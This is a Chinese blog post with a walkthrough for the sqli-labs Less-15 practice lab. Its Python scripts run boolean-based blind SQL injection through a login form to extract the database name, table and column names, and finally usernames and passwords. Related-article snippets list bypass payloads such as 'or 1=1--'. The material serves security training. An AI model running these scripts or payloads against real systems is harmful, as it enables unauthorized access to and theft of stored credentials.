SQL注入实例(sqli-labs/less-15)

已于 2024-08-08 14:51:02 修改
阅读量180 收藏
点赞数 2
分类专栏: sql靶场练习 文章标签: sql less 数据库
于 2024-08-08 13:58:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/141024717
版权

0、初始页面

1、确定闭合符号

确定符号的闭合

2、爆库名

python脚本爆库名

def inject_database(url):
    name = ''
    for i in range(1,20):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1' or ascii(substr(database(),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

3、爆表名

使用python脚本

inject_database(url):
    name = ''
    for i in range(1,40):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

4、爆列名

使用python脚本

def inject_database(url):
    name = ''
    for i in range(1,40):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

5、查询最终目标

使用python脚本,查询后续的内容修改concat的范围就行

def inject_database(url):
    name = ''
    for i in range(1,20):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            payload = "-1' or ascii(substr(concat((select group_concat(username,0x3a,password) from users),1,20),%d,1))>%d # " %(i,mid)
            data = {"uname":payload,"passwd":"aaa"}
            r = requests.post(url,data)
            if "flag.jpg" in r.text:
                low = mid+1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

魏大橙
关注
专栏目录
sqli-labs靶场Less-15
songling515010475的专栏
08-26 265
1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入 分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。 2、使用盲注获取数据库长度 -- 盲注 admin' and length(databa...
SQL注入-08】二次注入案例—以sqli-labs-less24为例
m0_64378913的博客
05-06 1465
1 二次注入概述 1.1 定义 定义:在将数据(一次注入的)存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。 例子:在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。 1.2 思路 (1)黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或
Sqlilabs Less-15
Light_inthe_eyes的博客
03-07 168
判断是单引号字符型注入: uname=admin'#&passwd=&submit=Submit 判断列数: uname=admin'+order+by+2#&passwd=&submit=Submit
sqli-labs less-15 post布尔注入
最新发布
wanggonghanfei的博客
10-07 993
sqli-labs less-15 post布尔盲注
sqli-labs/Less-15
m0_71299382的博客
11-18 540
sqli-labs第十五关
SQLi LABS Less 15 布尔盲注_sqli-labs 15 为何 要输入 用户名(1)
2401_84264727的博客
05-17 693
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~使用万能账号登录成功后,页面不会动态返回数据(返回写死的图片),无法使用联合注入。字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。长度肯定大于1,页面正常显示(登录成功),确定payload可用。参数中添加引号,页面不显示数据库的报错信息,报错注入无法使用。
[网络安全]sqli-labs Less-15 解题详析
等风来
07-24 2586
以上为[网络安全]sqli-labs Less-15 解题详析,后续将分享[网络安全]sqli-labs Less-16 解题详析我是秋说,我们下次见。
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 685
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2044
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2624
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
SQLi-LABS Page-1(Basic Challenges)
07-24
1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并尝试构造SQL语句。 2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字...
sqli-labs (less15-less16)
Xi4or0uji
07-31 1069
less 15 post方法单引号时间盲注 这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
sqli labs less 15
Xiaoxiaoqiang_的博客
03-02 229
sql注入
sqli labs less 16
Xiaoxiaoqiang_的博客
03-02 224
sql注入
sqli-labs-Less-15 时间盲注
feng的博客
09-24 501
sqli-labs的这几题是post注入,之前的几天用万能密码都可以过,但是这题用了各种方式都没回显,因此判断是时间盲注。 关于万能密码,这里引用一下郁离歌大佬的: 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'O
sqli-labs(less-15 ~ less-17)
m0_64849639的博客
08-01 846
1、这里其它的跟前面sqli-labs中的less-11~14是一样的(),可以用万能密码登录,但是区别是此处没有回显和报错了,所以前面的union联合注入和报错注入就不行了;所以我们可以采用时间盲注,关于时间盲注的具体细节可以看上面我的另一篇文章2、我们首先得确定是何种闭合方式:经过测试是单引号的闭合方式password:13、我们测试一下时间盲注:password:1发现页面开始出现延迟所以验证我们的猜想。
Sqli-labs之Less-15和Less-16
→_→
04-08 2361
Less-15 基于布尔型/时间延迟单引号POST型盲注 测试: ?id=1uname=1&passwd=1uname=1&passwd=1 ?id=1'...
sqli-labs(15
jimggg的博客
03-20 622
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 这里写的清清楚楚 A 先拆解长度 然后在逐步拆解 and是与运算;or是或运算。 区别2: and运算要前后两个运算对象都为真是,and运算结果才为真; or运算是两个运算对象中有一个为真,or运算结果就为真。 区别3: and运算中如...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值